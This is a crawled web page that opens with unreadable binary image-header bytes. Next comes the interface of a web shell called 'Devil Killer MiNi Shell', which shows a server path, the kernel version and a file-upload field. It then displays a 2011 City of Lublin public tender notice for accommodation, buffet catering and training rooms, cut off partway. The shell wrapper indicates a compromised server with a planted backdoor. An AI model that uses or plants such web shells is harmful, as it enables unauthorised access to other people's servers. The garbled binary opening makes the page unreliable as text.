JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110113/16217-N-2011.html

<p class="kh_header"><b>Lublin: Zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych) - 5 części.</b><br>
<b>Numer ogłoszenia: 16217 - 2011; data zamieszczenia: 13.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lublin , Pl. Łokietka 1, 20-950 Lublin, woj. lubelskie, tel. 081 4663000, faks 081 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie pobytu uczestników szkoleń (nocleg, wyżywienie, wynajem sal szkoleniowych) - 5 części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Zorganizowanie pobytu uczestników 5 szkoleń  2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 10 pokoi 2 osobowych, 10 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 9.00 pierwszego dnia pobytu i trwa do godz.15.00 drugiego dnia pobytu.
1.1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.1.5.1.Obiad w formie bufetu(w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
zupa (minimum dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna z expresu, rozpuszczalna, capuccino, latte)
herbata ( różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) :
danie na ciepło (3 do wyboru)
sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
przystawki (wybór zimnych przekąsek mięsnych i rybnych)
wędliny (różnorodne, minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe) 
warzywa (świeże i konserwowe)
pieczywo (różnorodne- jasne, ciemne, bagietki)
napoje: kawa (różnorodna-z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.1.5.3.Śniadanie w formie bufetu (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
wędliny (różnorodne- minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe)
dżemy
jajka
płatki śniadaniowe, muesli
mleko (ciepłe i zimne)
jogurty
świeże owoce
pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
przystawki (wybór zimnych przekąsek mięsnych, rybnych)
zupa (dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.6.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną: z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną: czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sali szkoleniowej.
1.1.7.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.1.8.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.1.9.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.1.10.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.1.11.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.1.12.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi do realizacji zamówienia tj. hotelem, motelem lub pensjonatem o standardzie minimum 3 gwiazdek, w odległości od 160 km do 200 km od centrum miasta Lublin tj. Bramy Krakowskiej.
UWAGA:
Zamawiający będzie weryfikował odległość w przedziale od 160 do 200km wg wskazań map samochodowych. Droga, którą można dojechać do danego obiektu winna być drogą optymalną /po trasie/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.
2. Kalkulację ceny ofertowej
3. Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 
4. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 
5. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca - w przypadku osób fizycznych. 
6. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
7. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Ilość gwiazdek - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony przewidują są następujące rodzaje i warunki zmiany treści umowy:
1)zmiana terminu szkolenia:
a)gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego;
b)działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie;
2)zmiana lokalizacji obiektu hotelarskiego:
a)gdy wskazany przez Wykonawcę obiekt nie spełnia wymogów określonych w umowie.
2.Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujących warunkach:
1)ad pkt 1) -   zmiana terminu szkolenia:
a)lit. a) - o okres umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego,
b)lit. b) - o okres działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
2)ad pkt 2)  zmiana  lokalizacji obiektu hotelarskiego:
a)lit. a)  - na obiekt hotelarski o standardzie nie niższym niż określony w umowie, pod warunkiem, iż obiekt ten znajdować się będzie w odległości od 160 km do 200 km od centrum miasta Lublin tj. Bramy Krakowskiej oraz nie zwiększania wartości wynagrodzenia brutto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Plac Litewski 1, pokój 4, po dokonaniu wpłaty 5,00 zł w budynku UM przy ul. Wieniawskiej 14 lub za zaliczeniem pocztowym (5,00 zł + koszt przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2011 godzina 10:30, miejsce: Biuro Zamówień Publicznych Urzędu Miasta Lublin, Plac Litewski 1, 20-080 Lublin, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia współfinansowany ze środków Unii Europejskiej: /NOVUS -  program rozwoju administracji samorządowej Warszawy, Poznania, Lublina, Ełku i Łodzi/ w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.
1.1.Osobami upoważnionymi do kontaktowania się z wykonawcami są:
2.1.W zakresie przedmiotu zamówienia: p. Dorota Menczewicz - Wydział Organizacji Urzędu Miasta Lublin, ul. Dolna 3-Maja 5, pok. 303, telefon (081) 466-12-88.
2.2.W zakresie procedury: p. Przemysław Włodarczyk - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 4, telefon (081) 466-30-20..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.Zorganizowanie pobytu uczestników 5 szkoleń  2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 10 pokoi 2 osobowych, 10 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 9.00 pierwszego dnia pobytu i trwa do godz.15.00 drugiego dnia pobytu.
1.1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.1.5.1.Obiad w formie bufetu(w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
zupa (minimum dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna z expresu, rozpuszczalna, capuccino, latte)
herbata ( różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) :
danie na ciepło (3 do wyboru)
sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
przystawki (wybór zimnych przekąsek mięsnych i rybnych)
wędliny (różnorodne, minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe) 
warzywa (świeże i konserwowe)
pieczywo (różnorodne- jasne, ciemne, bagietki)
napoje: kawa (różnorodna-z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.1.5.3.Śniadanie w formie bufetu (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
wędliny (różnorodne- minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe)
dżemy
jajka
płatki śniadaniowe, muesli
mleko (ciepłe i zimne)
jogurty
świeże owoce
pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
przystawki (wybór zimnych przekąsek mięsnych, rybnych)
zupa (dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.6.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną: z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną: czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sali szkoleniowej.
1.1.7.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.1.8.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.1.9.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.1.10.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.1.11.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.1.12.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi).
2.Termin wykonania zamówienia: 24-25 luty 2011r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
